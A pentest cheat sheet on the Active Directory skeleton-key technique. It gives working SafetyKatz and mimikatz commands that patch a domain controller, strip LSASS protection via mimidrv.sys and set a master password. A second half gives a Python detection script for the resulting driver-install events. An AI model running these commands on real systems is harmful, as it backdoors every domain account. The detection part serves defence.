# skeleton-key

## Methodology

1. Have domain admin privileges.
2. Patch the domain controller.
3. Use the password `mimikatz` to access any machine with a valid username.

## Binaries

> [!INFO] Remember to follow the Binaries methodology

## SafetyKatz

**Inject a skeleton key on a domain controller**

```
SafetyKatz.exe '"privilege::debug" "misc::skeleton"' -ComputerName us-dc
```

Any machine can now be accessed with a valid username and the password `mimikatz`:

```
Enter-PSSession -ComputerName us-dc -Credential us\Administrator
```

**If LSASS is running as a protected service, Skeleton Key can still be used, but it needs the mimikatz driver ([mimidrv.sys](https://github.com/ParrotSec/mimikatz/blob/master/x64/mimidrv.sys)) on the disk of the target DC:**

```
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-
```

Note that the above is very noisy in the logs because it creates a service.
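The service creation noted above is recorded by the Service Control Manager as event 7045 in the System log. The following triage script is an added example, not part of the original notes: it assumes the 7045 records have been exported as event XML, that the driver keeps its stock name `mimidrv`, and that legitimate kernel drivers live under `System32\drivers`; the sample records are constructed.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
DRIVER_DIR = "system32\\drivers\\"  # assumption: normal home of kernel drivers

def _event(name, path, stype):
    # Builds one constructed 7045 record in Windows event XML form.
    return (f'<Event xmlns="{NS["e"]}"><System>'
            f'<EventID Qualifiers="16384">7045</EventID>'
            f'<Computer>us-dc</Computer></System><EventData>'
            f'<Data Name="ServiceName">{name}</Data>'
            f'<Data Name="ImagePath">{path}</Data>'
            f'<Data Name="ServiceType">{stype}</Data></EventData></Event>')

# Constructed sample records (not real log data); names other than mimidrv are hypothetical.
SAMPLE = "<Events>" + "".join(_event(*r) for r in [
    ("mimidrv", r"\??\C:\Users\Public\mimidrv.sys", "kernel mode driver"),
    ("exampledrv", r"\??\C:\Temp\exampledrv.sys", "kernel mode driver"),
    ("examplefilter", r"\SystemRoot\System32\drivers\examplefilter.sys", "kernel mode driver"),
    ("ExampleUpdater", r"C:\Program Files\Example\updater.exe", "user mode service"),
]) + "</Events>"

def triage_service_installs(xml_text):
    """Return (computer, service, image_path, reason) for suspicious driver installs."""
    findings = []
    for ev in ET.fromstring(xml_text).iterfind("e:Event", NS):
        if ev.findtext("e:System/e:EventID", "", NS).strip() != "7045":
            continue
        data = {d.get("Name"): (d.text or "") for d in ev.iterfind("e:EventData/e:Data", NS)}
        if data.get("ServiceType", "").lower() != "kernel mode driver":
            continue  # only kernel driver services are relevant here
        name, path = data.get("ServiceName", ""), data.get("ImagePath", "")
        norm = path.lower().replace("/", "\\")
        if "mimidrv" in name.lower() or "mimidrv" in norm:
            reason = "mimidrv name"
        elif DRIVER_DIR not in norm:
            # Catches a renamed driver loaded from a user-writable location.
            reason = "driver outside system32\\drivers"
        else:
            continue
        findings.append((ev.findtext("e:System/e:Computer", "", NS), name, path, reason))
    return findings

if __name__ == "__main__":
    for finding in triage_service_installs(SAMPLE):
        print(finding)
```

On a domain controller, any kernel driver service installed outside a change window deserves review regardless of its name, since the name check alone is defeated by renaming the file.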
